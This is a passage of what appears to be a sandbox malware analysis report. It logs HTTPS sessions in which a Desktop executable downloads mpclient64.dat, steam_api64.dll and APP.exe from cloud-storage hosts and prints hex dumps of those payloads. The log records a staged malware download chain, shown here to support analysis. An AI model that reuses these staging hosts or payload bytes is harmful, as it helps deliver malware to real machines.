E3AHURu3\|$@ucHD$pHHHD$XHL$XHD$pH@HD$(HD$ ALMUHVHUD$0HD$p@$D$D\|$DHcD$DHHH
2025-01-16 12:35:15 UTC	16384	IN	Data Raw: 85 c0 75 07 b0 01 e9 f7 00 00 00 48 8b 44 24 70 48 8b 40 08 48 89 44 24 40 0f b7 44 24 30 66 89 44 24 34 48 8b 44 24 70 48 83 c0 50 48 8b c8 e8 a4 5c ff ff 48 89 44 24 48 48 8b 44 24 70 48 83 c0 50 48 8b c8 e8 2e 5d ff ff 48 89 44 24 50 48 8b 44 24 70 48 83 c0 48 48 8b 4c 24 40 48 89 4c 24 20 44 0f b7 4c 24 34 4c 8b 44 24 48 48 8b 54 24 50 48 8b c8 e8 2e 1b 01 00 89 44 24 38 83 7c 24 38 00 74 09 48 8b 44 24 70 c6 40 38 01 eb 56 48 8b 44 24 70 48 83 c0 50 48 8b c8 e8 d7 5c ff ff b9 01 00 00 00 48 6b c9 00 48 03 c1 48 8b d0 48 8b 4c 24 70 e8 4e 60 ff ff 0f b6 c0 85 c0 75 04 32 c0 eb 3d 48 8b 4c 24 70 e8 09 c9 ff ff 0f b6 c0 85 c0 75 04 b0 01 eb 28 48 8b 44 24 70 c7 40 48 01 00 00 00 48 8b 44 24 70 48 83 c0 50 48 8b c8 e8 81 5c ff ff 48 8b 4c 24 70 48 89 41 Data Ascii: uHD$pH@HD$@D$0fD$4HD$pHPH\HD$HHD$pHPH.]HD$PHD$pHHHL$@HL$ DL$4LD$HHT$PH.D$8\|$8tHD$p@8VHD$pHPH\HkHHHL$pN`u2=HL$pu(HD$p@HHD$pHPH\HL$pHA
2025-01-16 12:35:15 UTC	16384	IN	Data Raw: 02 75 12 8b 05 5b 17 04 00 83 e0 10 85 c0 75 05 e9 37 ff ff ff c6 44 24 34 01 e9 2d ff ff ff 48 8b 84 24 80 00 00 00 48 8b 4c 24 78 48 8b 49 58 48 8b 40 58 48 2b c1 48 8b 4c 24 70 48 89 41 58 48 8b 84 24 80 00 00 00 48 8b 4c 24 78 48 8b 49 60 48 8b 40 60 48 2b c1 48 8b 4c 24 70 48 89 41 60 48 8b 44 24 70 48 c7 00 00 00 00 00 0f b6 44 24 34 85 c0 74 0a c7 44 24 50 01 00 00 00 eb 08 c7 44 24 50 00 00 00 00 8b 44 24 50 48 83 c4 68 c3 cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 33 c9 e8 d0 06 01 00 90 48 8b 4c 24 40 e8 55 36 00 00 90 33 c9 e8 4d 07 01 00 48 8d 05 ae 0e 03 00 48 89 44 24 28 48 8d 05 02 c8 02 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 46 78 00 00 83 f8 01 75 03 cc 33 c0 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 Data Ascii: u[u7D$4-H$HL$xHIXH@XH+HL$pHAXH$HL$xHI`H@`H+HL$pHA`HD$pHD$4tD$PD$PD$PHhHL$H83HL$@U63MHHD$(HHD$ E3E333Fxu3H8HL$H
2025-01-16 12:35:15 UTC	16276	IN	Data Raw: cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 33 d2 48 8b 05 be d5 03 00 b9 40 00 00 00 48 f7 f1 48 8b c2 48 8b 0d ac d5 03 00 48 8b 54 24 30 48 33 d1 48 8b ca 8b d0 e8 6a 00 00 00 48 83 c4 28 c3 cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 33 d2 48 8b 05 7e d5 03 00 b9 40 00 00 00 48 f7 f1 48 8b c2 b9 40 00 00 00 48 2b c8 48 8b c1 8b d0 48 8b 4c 24 30 e8 2c 00 00 00 48 33 05 55 d5 03 00 48 83 c4 28 c3 48 89 4c 24 08 48 83 ec 18 0f b6 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 8b 44 24 10 0f b6 c8 48 8b 44 24 08 48 d3 c8 c3 cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 18 48 8b 44 24 20 48 89 04 24 eb 0c 48 8b 04 24 48 83 c0 08 48 89 04 24 48 8b 44 24 20 48 83 c0 08 48 39 04 24 74 0e 48 8b 04 Data Ascii: HL$H(3H@HHHHT$0H3HjH(HL$H(3H~@HH@H+HHL$0,H3UH(HL$H$HT$HL$D$HD$HHT$HL$HHD$ H$H$HH$HD$ HH9$tH
2025-01-16 12:35:15 UTC	16384	IN	Data Raw: 24 28 48 8b 84 24 a0 00 00 00 48 89 44 24 20 44 8b 8c 24 98 00 00 00 4c 8b 84 24 90 00 00 00 48 8b 94 24 88 00 00 00 48 8b 8c 24 80 00 00 00 e8 10 00 00 00 48 8d 4c 24 30 e8 36 f0 fe ff 48 83 c4 78 c3 cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 68 48 8b 8c 24 98 00 00 00 e8 8b fd ff ff 48 89 44 24 30 48 83 7c 24 30 00 74 60 48 8b 44 24 30 48 83 b8 b8 03 00 00 00 74 51 48 8b 44 24 30 48 8b 80 b8 03 00 00 48 89 44 24 40 48 8b 44 24 40 48 89 44 24 48 48 8b 84 24 90 00 00 00 48 89 44 24 20 44 8b 8c 24 88 00 00 00 4c 8b 84 24 80 00 00 00 48 8b 54 24 78 48 8b 4c 24 70 48 8b 44 24 48 e8 83 17 02 00 e9 9c 00 00 00 48 8b 94 24 98 00 00 00 48 8d 0d 37 aa 03 00 e8 5a fd ff ff 48 8b 08 e8 82 bf ff ff 48 89 44 24 38 48 83 7c 24 38 00 74 47 Data Ascii: $(H$HD$ D$L$H$H$HL$06HxDL$ LD$HT$HL$HhH$HD$0H\|$0t`HD$0HtQHD$0HHD$@HD$@HD$HH$HD$ D$L$HT$xHL$pHD$HH$H7ZHHD$8H\|$8tG
2025-01-16 12:35:15 UTC	16384	IN	Data Raw: 44 24 59 41 eb 05 c6 44 24 59 61 0f be 44 24 59 83 e8 3a 89 84 24 98 00 00 00 48 c7 84 24 a8 00 00 00 ff 03 00 00 48 8b 84 24 80 00 00 00 48 8b 00 48 c1 e8 34 48 25 ff 07 00 00 48 85 c0 75 5e 48 8b 84 24 d8 00 00 00 c6 00 30 48 8b 84 24 d8 00 00 00 48 ff c0 48 89 84 24 d8 00 00 00 48 8b 84 24 80 00 00 00 48 b9 ff ff ff ff ff ff 0f 00 48 8b 00 48 23 c1 48 85 c0 75 0e 48 c7 84 24 a8 00 00 00 00 00 00 00 eb 13 48 8b 84 24 a8 00 00 00 48 ff c8 48 89 84 24 a8 00 00 00 eb 1e 48 8b 84 24 d8 00 00 00 c6 00 31 48 8b 84 24 d8 00 00 00 48 ff c0 48 89 84 24 d8 00 00 00 48 8b 84 24 d8 00 00 00 48 89 84 24 b8 00 00 00 48 8b 84 24 d8 00 00 00 48 ff c0 48 89 84 24 d8 00 00 00 48 8b 84 24 b8 00 00 00 48 89 44 24 70 83 bc 24 f8 00 00 00 00 75 0a 48 8b 44 24 70 c6 00 00 eb Data Ascii: D$YAD$YaD$Y:$H$H$HH4H%Hu^H$0H$HH$H$HHH#HuH$H$HH$H$1H$HH$H$H$H$HH$H$HD$p$uHD$p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49745	183.66.100.45	443	3160	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:35:16 UTC	96	OUT	GET /mpclient64.dat HTTP/1.1 Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
2025-01-16 12:35:17 UTC	471	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 38357 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:35:16 GMT ETag: "064a2c07c19eb983c114b318216e2492" Last-Modified: Fri, 10 Jan 2025 23:32:07 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 6072581755993204641 x-cos-request-id: Njc4OGZkMDRfNTBmM2YwYl81ZDlfZjQ2Y2Y1ZQ== x-cos-server-side-encryption: AES256
2025-01-16 12:35:17 UTC	15913	IN	Data Raw: e8 c0 33 00 00 c0 33 00 00 96 9e 3b 5e 55 e3 8a b1 c3 8c 67 83 4f bb 1b 6d 46 62 84 01 aa 31 7c 73 14 d7 f9 22 34 6d a5 0f 00 00 00 00 01 f7 a8 88 38 da d3 a8 58 16 2e d6 ac 64 74 2e 23 8e bf 4d 29 3d 80 a2 dc 51 9e 54 aa 70 94 74 27 2b 3c c7 d4 bb e7 01 22 30 32 38 c2 dc 77 d9 dd 34 b6 43 34 c6 76 41 35 f7 24 51 46 20 cb 35 17 9d b1 00 ee 12 5d 1a b4 22 d1 db 9a 0d 5f b0 17 f9 bd b6 f9 d4 6d b8 e6 00 6b 01 1d 05 7e 99 86 24 1d ee 03 34 2d a0 da a1 4b 92 05 b4 97 a1 31 23 aa c7 44 30 0b 53 8f cb 14 11 71 6c ba 16 10 8d 2a a6 bb 69 c0 ab ba 32 f0 37 aa 1a dc 25 ad a9 3c 63 12 50 fc 40 34 7d cd 41 07 7e 48 62 6d 2d 94 83 ce 46 13 9f 96 b8 8f f5 f7 2a 9b 62 00 4a 59 cc c0 32 8b 36 b3 8f ea b7 f1 38 fe 1a 07 a3 6c fe 04 3c df 7a 2a 01 00 9b 2d a0 6c 1f 04 7a Data Ascii: 33;^UgOmFb1\|s"4m8X.dt.#M)=QTpt'+<"028w4C4vA5$QF 5]"_mk~$4-K1#D0Sqli27%<cP@4}A~Hbm-FbJY268l<z*-lz
2025-01-16 12:35:17 UTC	4	IN	Data Raw: 48 81 c4 08 Data Ascii: H
2025-01-16 12:35:17 UTC	16368	IN	Data Raw: 02 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 43 0f b7 44 7d 00 45 8b 04 84 4c 03 c3 4c 3b c7 0f 82 aa 00 00 00 41 8b 84 1e 8c 00 00 00 48 03 c7 4c 3b c0 0f 83 96 00 00 00 45 33 d2 45 8b ca 45 38 10 74 1f 41 83 f9 3c 73 19 41 8b c1 42 8a 0c 00 88 4c 04 30 80 f9 2e 74 09 41 ff c1 47 38 14 01 75 e1 41 8d 41 01 8b d0 c6 44 04 30 64 41 8d 41 02 c6 44 04 30 6c 41 8d 41 03 c6 44 04 30 6c 41 8d 41 04 4e 8d 0c 02 44 88 54 04 30 41 8b d2 45 38 11 74 17 83 fa 7f 73 12 8b ca ff c2 42 8a 04 09 88 44 0c 70 46 38 14 0a 75 e9 48 8b 8d 50 01 00 00 4c 8d 4c 24 70 8b c2 4c 8d 44 24 30 48 8b d3 44 88 54 04 70 e8 0e 00 00 00 4c 8b c0 49 8b c0 e9 24 ff ff ff cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 65 48 8b 04 25 30 00 00 00 45 33 Data Ascii: A_A^A]A\_^[]CD}ELL;AHL;E3EE8tA<sABL0.tAG8uAAD0dAAD0lAAD0lAANDT0AE8tsBDpF8uHPLL$pLD$0HDTpLI$HHXHhHpHx AVH eH%0E3
2025-01-16 12:35:17 UTC	6072	IN	Data Raw: 17 39 2e 74 13 83 3e 05 74 05 83 3e 06 75 41 56 57 e8 8f 0c 00 00 eb 36 8d 44 24 24 50 56 57 e8 d4 fa ff ff 83 c4 0c 85 c0 74 0f 8d 44 24 24 50 56 57 e8 a0 00 00 00 83 c4 0c 8d 44 24 24 50 57 e8 7f f5 ff ff eb 07 56 57 e8 e9 03 00 00 59 59 83 bf 30 02 00 00 03 75 02 eb fe 8b 6c 24 10 8b 87 20 09 00 00 83 f8 02 74 05 83 f8 03 75 37 8b 87 60 0d 00 00 85 c0 74 2d ff b7 58 0d 00 00 6a 00 50 e8 c0 16 00 00 8b 5c 24 20 83 c4 0c 68 00 c0 00 00 6a 00 ff b7 60 0d 00 00 ff d3 83 a7 60 0d 00 00 00 eb 04 8b 5c 24 14 ff 37 8b b7 30 02 00 00 6a 00 57 e8 8d 16 00 00 83 c4 0c 68 00 c0 00 00 6a 00 57 ff d3 83 fe 02 75 04 6a 00 ff d5 33 c0 e9 c1 fc ff ff 81 ec 7c 02 00 00 53 8b 9c 24 84 02 00 00 33 c0 55 56 8b b4 24 90 02 00 00 33 ed 21 6c 24 18 57 8d 7c 24 48 ab ab ab ab Data Ascii: 9.t>t>uAVW6D$$PVWtD$$PVWD$$PWVWYY0ul$ tu7`t-XjP\$ hj``\$70jWhjWuj3\|S$3UV$3!l$W\|$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49759	183.66.100.45	443	3160	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:35:19 UTC	117	OUT	GET /steam_api64.dll HTTP/1.1 Host: wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com Connection: Keep-Alive
2025-01-16 12:35:19 UTC	476	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 301928 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:35:19 GMT ETag: "543515a345cc88cb93413953f06f34a4" Last-Modified: Tue, 07 Jan 2025 13:41:58 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 3051293360534322159 x-cos-request-id: Njc4OGZkMDdfNDc3NzA1MGJfMmVhOTNfYjdiMzk2ZQ== x-cos-server-side-encryption: AES256
2025-01-16 12:35:19 UTC	15908	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 56 4c 56 00 01 00 00 00 00 6e 04 00 fd 7c ff 64 69 96 9c 7b a3 67 ff a6 70 ac 86 b1 3f 7c 77 ac e3 ee f1 c1 28 55 f4 9a e0 b2 12 9a 52 b2 1d e8 67 5c 07 82 9d 34 9f 42 63 f5 08 e8 ce 43 c9 8c 77 1c dc 73 7e 14 9e c7 58 75 66 16 0b 6e 18 e7 69 e7 8b 2f c6 2d 40 f4 24 7f 8c 8e 42 60 02 39 da 4e 92 00 d6 47 b0 6c b6 14 8e 95 f4 fe 59 f5 08 02 46 f5 d5 f2 0d 80 ac 03 89 66 1c ca e9 42 d0 da 8c 72 56 f4 0d 8a d8 43 19 ec 05 9a b8 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@VLVn\|di{gp?\|w(URg\4BcCws~Xufni/-@$B`9NGlYFfBrVC)
2025-01-16 12:35:19 UTC	16384	IN	Data Raw: 10 48 8b cb 41 0f b6 51 18 e9 92 00 00 00 48 8b 47 10 48 8b cf 80 78 19 00 75 0e 90 48 8b c8 48 8b 40 10 80 78 19 00 74 f3 48 89 4a 10 41 0f b6 51 18 eb 6c 48 89 41 08 49 8b 0e 48 89 08 49 3b 00 75 05 48 8b d8 eb 1f 80 7f 19 00 48 8b 58 08 75 04 48 89 5f 08 48 89 3b 49 8b 08 48 89 48 10 49 8b 08 48 89 41 08 48 8b 0e 4c 39 71 08 75 06 48 89 41 08 eb 12 49 8b 4e 08 4c 39 31 75 05 48 89 01 eb 04 48 89 41 10 49 8b 4e 08 0f b6 50 18 48 89 48 08 41 0f b6 4e 18 88 48 18 41 88 56 18 80 fa 01 0f 85 bd 01 00 00 48 8b 06 48 3b 78 08 0f 84 ac 01 00 00 66 0f 1f 44 00 00 80 7f 18 01 4c 8b c3 0f 85 99 01 00 00 48 8b 0b 48 3b f9 0f 85 c3 00 00 00 48 8b 4b 10 80 79 18 00 75 54 c6 41 18 01 48 8b 4b 10 c6 43 18 00 48 8b 01 48 89 43 10 48 8b 01 80 78 19 00 75 04 48 89 58 08 Data Ascii: HAQHGHxuHH@xtHJAQlHAIHI;uHHXuH_H;IHHIHAHL9quHAINL91uHHAINPHHANHAVHH;xfDLHH;HKyuTAHKCHHCHxuHX
2025-01-16 12:35:19 UTC	16384	IN	Data Raw: 02 00 48 89 84 24 90 00 00 00 48 8d 05 8f 0a 02 00 48 89 84 24 98 00 00 00 48 8d 05 84 0a 02 00 48 89 84 24 a0 00 00 00 48 8d 05 79 0a 02 00 48 89 84 24 a8 00 00 00 c6 05 df cd 03 00 00 48 8b 17 41 b8 03 00 00 00 48 8b cd e8 01 91 00 00 85 c0 74 0f ff c6 48 ff c3 48 83 c7 08 48 83 fb 0c 7e dc 48 8d 4d 04 e8 29 9f 00 00 48 8d 4d 07 8b f8 e8 1e 9f 00 00 8b d8 4c 8d 8c 24 d8 00 00 00 33 c0 4c 8d 44 24 40 89 44 24 40 48 8d 15 1a 0a 02 00 89 84 24 d8 00 00 00 49 8b ce 89 84 24 e8 00 00 00 48 8d 84 24 e8 00 00 00 48 89 44 24 20 e8 67 03 00 00 8b 8c 24 e8 00 00 00 48 8d 15 f9 09 02 00 8b 44 24 40 44 8b ce 89 4c 24 38 44 8b c3 8b 8c 24 d8 00 00 00 89 4c 24 30 48 8d 0d 41 cd 03 00 89 44 24 28 89 7c 24 20 e8 ec c9 ff ff 4c 8d 9c 24 b0 00 00 00 49 8b 5b 20 49 8b 6b Data Ascii: H$HH$HH$HyH$HAHtHHH~HM)HML$3LD$@D$@H$I$H$HD$ g$HD$@DL$8D$L$0HAD$(\|$ L$I[ Ik
2025-01-16 12:35:19 UTC	16384	IN	Data Raw: 02 00 48 2b d0 8b 42 fc d3 e8 49 89 50 08 41 89 40 18 0f b6 0a 83 e1 0f 4a 0f be 84 09 e0 96 02 00 42 8a 8c 09 f0 96 02 00 48 2b d0 8b 42 fc d3 e8 49 89 50 08 41 89 40 1c 0f b6 0a 83 e1 0f 4a 0f be 84 09 e0 96 02 00 42 8a 8c 09 f0 96 02 00 48 2b d0 8b 42 fc d3 e8 41 89 40 20 48 8d 42 04 49 89 50 08 8b 0a 41 89 48 24 8b 4c 24 60 ff c1 49 89 40 08 89 4c 24 60 3b 4d a8 0f 82 68 fe ff ff 48 8b 4d 28 48 33 cc e8 ef a0 01 00 48 81 c4 38 01 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 e8 82 cc 00 00 cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 33 db 4d 8b f0 48 8b ea 48 8b f9 39 59 04 0f 84 f0 00 00 00 48 63 71 04 e8 06 ea ff ff 4c 8b c8 4c 03 ce 0f 84 db 00 00 00 85 f6 74 0f 48 63 77 04 e8 ed e9 ff ff 48 8d 0c 06 eb 05 48 8b Data Ascii: H+BIPA@JBH+BIPA@JBH+BA@ HBIPAH$L$`I@L$`;MhHM(H3H8A_A^A]A\_^[]HHXHhHpHx AVH 3MHH9YHcqLLtHcwHH
2025-01-16 12:35:19 UTC	16384	IN	Data Raw: e1 f7 89 4b 30 48 8d 4b 58 e8 02 da ff ff 48 85 ff 75 04 83 63 30 df c6 43 54 00 44 8a cd 45 8b c6 48 8b cb 48 83 fe 08 75 0a 48 8b d7 e8 9e dc ff ff eb 07 8b d7 e8 69 db ff ff 8b 43 30 c1 e8 07 a8 01 74 1d 83 7b 50 00 74 09 48 8b 4b 48 80 39 30 74 0e 48 ff 4b 48 48 8b 4b 48 c6 01 30 ff 43 50 b0 01 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 48 8b d9 41 8a e8 8b 49 3c 44 8b f2 e8 f2 f7 ff ff 48 8b c8 48 8b f0 48 83 e9 01 74 7e 48 83 e9 01 74 58 48 83 e9 02 74 34 48 83 f9 04 74 17 e8 67 8e 00 00 c7 00 16 00 00 00 e8 90 0b 00 00 32 c0 e9 0b 01 00 00 8b 43 30 48 83 43 20 08 c1 e8 04 a8 01 48 8b 43 20 48 8b 78 f8 eb 5c 8b 43 30 48 83 43 20 08 c1 Data Ascii: K0HKXHuc0CTDEHHuHiC0t{PtHKH90tHKHHKH0CPH\$0Hl$8Ht$@H\|$HH A^HHXHhHpHx AVH HAI<DHHHt~HtXHt4Htg2C0HC HC Hx\C0HC
2025-01-16 12:35:19 UTC	16384	IN	Data Raw: 89 5b e8 e8 8c e8 ff ff 38 5c 24 50 74 46 83 f8 01 74 41 38 5f 3a 74 04 b0 01 eb 3a 48 83 87 80 00 00 00 08 48 8b 87 80 00 00 00 48 8b 48 f8 48 85 c9 75 12 e8 fb 4e 00 00 c7 00 16 00 00 00 e8 24 cc ff ff eb 0a 48 8b 44 24 58 b3 01 48 89 01 8a c3 eb 02 32 c0 48 8b 5c 24 60 48 83 c4 40 5f c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 56 41 57 48 83 ec 20 45 33 db 44 8b f2 4c 8b c9 44 38 59 3a 75 5f 48 83 81 80 00 00 00 08 48 8b 81 80 00 00 00 4c 8b 58 f8 4d 85 db 75 31 e8 87 4e 00 00 c7 00 16 00 00 00 e8 b0 cb ff ff 32 c0 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 8b 7c 24 58 48 83 c4 20 41 5f 41 5e 41 5c c3 f6 01 01 74 11 48 83 c0 08 48 89 81 80 00 00 00 44 8b 50 f8 eb 04 49 83 ca ff 4d 85 d2 75 27 f6 01 04 74 15 48 8b Data Ascii: [8\$PtFtA8_:t:HHHHHuN$HD$XH2H\$`H@_HHXHhHpHx ATAVAWH E3DLD8Y:u_HHLXMu1N2H\$@Hl$HHt$PH\|$XH A_A^A\tHHDPIMu'tH
2025-01-16 12:35:19 UTC	16384	IN	Data Raw: 24 60 48 83 c4 50 5d c3 8b cb e8 01 00 00 00 cc 40 53 48 83 ec 20 8b d9 e8 6b 52 00 00 83 f8 01 74 28 65 48 8b 04 25 60 00 00 00 8b 90 bc 00 00 00 c1 ea 08 f6 c2 01 75 11 ff 15 75 f7 00 00 48 8b c8 8b d3 ff 15 72 f7 00 00 8b cb e8 0b 00 00 00 8b cb ff 15 6b f7 00 00 cc cc cc 40 53 48 83 ec 20 48 83 64 24 38 00 4c 8d 44 24 38 8b d9 48 8d 15 de 2b 01 00 33 c9 ff 15 26 f6 00 00 85 c0 74 1f 48 8b 4c 24 38 48 8d 15 de 2b 01 00 ff 15 50 f6 00 00 48 85 c0 74 08 8b cb ff 15 3b f8 00 00 48 8b 4c 24 38 48 85 c9 74 06 ff 15 63 f5 00 00 48 83 c4 20 5b c3 cc 48 89 0d 15 d4 02 00 c3 33 d2 33 c9 44 8d 42 01 e9 87 fe ff ff cc cc cc 45 33 c0 41 8d 50 02 e9 78 fe ff ff 8b 05 ea d3 02 00 c3 cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 56 41 57 48 83 Data Ascii: $`HP]@SH kRt(eH%`uuHrk@SH Hd$8LD$8H+3&tHL$8H+PHt;HL$8HtcH [H33DBE3APxHHXHhHpHx ATAVAWH
2025-01-16 12:35:19 UTC	16276	IN	Data Raw: 00 8b 03 a8 40 0f 85 cd 00 00 00 83 c8 40 e9 ce 00 00 00 41 b3 01 e9 bd 00 00 00 40 84 ff 0f 85 b4 00 00 00 8b 03 40 b7 01 a8 02 0f 85 a7 00 00 00 83 e0 fe 40 8a d7 83 c8 02 89 03 8b 43 04 83 e0 fc 83 c8 04 89 43 04 e9 98 00 00 00 45 84 d2 0f 85 82 00 00 00 44 09 33 41 b2 01 41 8a d2 e9 81 00 00 00 83 e9 54 74 67 83 e9 0e 74 53 83 e9 01 74 3c 83 e9 0b 74 2b 83 e9 06 74 17 83 f9 04 0f 85 62 01 00 00 8b 03 0f ba e0 09 73 4a 0f ba e8 0a eb 4d 8b 03 a9 00 c0 00 00 75 3b 0f ba e8 0e eb 3e 45 84 c9 75 30 0f ba 73 04 0b eb 0a 45 84 c9 75 24 0f ba 6b 04 0b 41 b1 01 41 8a d1 eb 24 8b 03 a9 00 c0 00 00 75 0e 0f ba e8 0f eb 11 8b 03 0f ba e0 0c 73 05 40 8a d5 eb 08 0f ba e8 0c 89 03 b2 01 8a c2 f6 d8 48 1b c9 83 e1 02 4c 03 c1 84 d2 0f 85 ae fe ff ff 45 84 db 49 8d Data Ascii: @@A@@@CCED3AATtgtSt<t+tbsJMu;>Eu0sEu$kAA$us@HLEI
2025-01-16 12:35:19 UTC	16384	IN	Data Raw: 8d 8d 44 03 00 00 89 85 40 03 00 00 e8 87 ac fe ff 48 8d 0d 30 f6 fd ff 48 c1 e6 02 0f b7 84 b9 c0 b2 02 00 48 8d 91 b0 a9 02 00 48 8d 8d 44 03 00 00 4c 8b c6 48 03 cb 48 8d 14 82 e8 67 9c fe ff 44 8b 95 40 03 00 00 45 3b d7 0f 87 9a 00 00 00 8b 85 44 03 00 00 85 c0 75 0f 45 33 e4 44 89 a5 70 01 00 00 e9 fa 02 00 00 41 3b c7 0f 84 f1 02 00 00 45 85 e4 0f 84 e8 02 00 00 45 33 c0 4c 8b d0 45 33 c9 42 8b 8c 8d 74 01 00 00 41 8b c0 49 0f af ca 48 03 c8 4c 8b c1 42 89 8c 8d 74 01 00 00 49 c1 e8 20 45 03 cf 45 3b cc 75 d7 45 85 c0 0f 84 a6 02 00 00 83 bd 70 01 00 00 73 73 1a 8b 85 70 01 00 00 44 89 84 85 74 01 00 00 44 8b a5 70 01 00 00 45 03 e7 eb 84 45 33 e4 44 89 a5 70 01 00 00 32 c0 e9 7c 02 00 00 45 3b e7 0f 87 ad 00 00 00 8b 9d 74 01 00 00 4d 8b c2 49 c1 Data Ascii: D@H0HHHDLHHgD@E;DuE3DpA;EE3LE3BtAIHLBtI EE;uEpsspDtDpEE3Dp2\|E;tMI
2025-01-16 12:35:19 UTC	16384	IN	Data Raw: 00 00 f3 0f 6f 57 10 66 0f 6f c2 66 0f 74 c3 66 0f d7 c0 85 c0 75 35 48 8b d3 49 8b c8 48 8b 5c 24 10 48 8b 74 24 18 5f e9 5f fd ff ff 4d 85 d2 75 d0 44 38 57 01 0f 84 ac 00 00 00 48 8b 5c 24 10 48 8b 74 24 18 5f e9 40 fd ff ff 0f bc c8 8b c1 49 2b c2 48 83 c0 10 48 83 f8 10 77 b9 44 2b c9 41 83 f9 0f 77 79 42 8b 8c 8e 78 4b 02 00 48 03 ce ff e1 66 0f 73 fa 01 eb 65 66 0f 73 fa 02 eb 5e 66 0f 73 fa 03 eb 57 66 0f 73 fa 04 eb 50 66 0f 73 fa 05 eb 49 66 0f 73 fa 06 eb 42 66 0f 73 fa 07 eb 3b 66 0f 73 fa 08 eb 34 66 0f 73 fa 09 eb 2d 66 0f 73 fa 0a eb 26 66 0f 73 fa 0b eb 1f 66 0f 73 fa 0c eb 18 66 0f 73 fa 0d eb 11 66 0f 73 fa 0e eb 0a 66 0f 73 fa 0f eb 03 0f 57 d2 66 0f eb d1 66 0f 6f ca 41 0f b6 00 84 c0 74 34 0f 1f 84 00 00 00 00 00 0f be c0 66 0f 6e c0 Data Ascii: oWfoftfu5HIH\$Ht$__MuD8WH\$Ht$_@I+HHwD+AwyBxKHfsefs^fsWfsPfsIfsBfs;fs4fs-fs&fsfsfsfsfsWffoAt4fn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49772	183.66.100.45	443	3160	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:35:21 UTC	113	OUT	GET /APP.exe HTTP/1.1 Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com Connection: Keep-Alive
2025-01-16 12:35:22 UTC	475	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 5632 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:35:22 GMT ETag: "53f534b5be5bd54c0bbd6168c510776e" Last-Modified: Thu, 16 Jan 2025 11:16:56 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 16613075677557648773 x-cos-request-id: Njc4OGZkMGFfMzM3NzA1MGJfMTc0ZTVfYjg2OTc4OQ== x-cos-server-side-encryption: AES256
2025-01-16 12:35:22 UTC	5632	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 9d e9 88 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 0c 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be 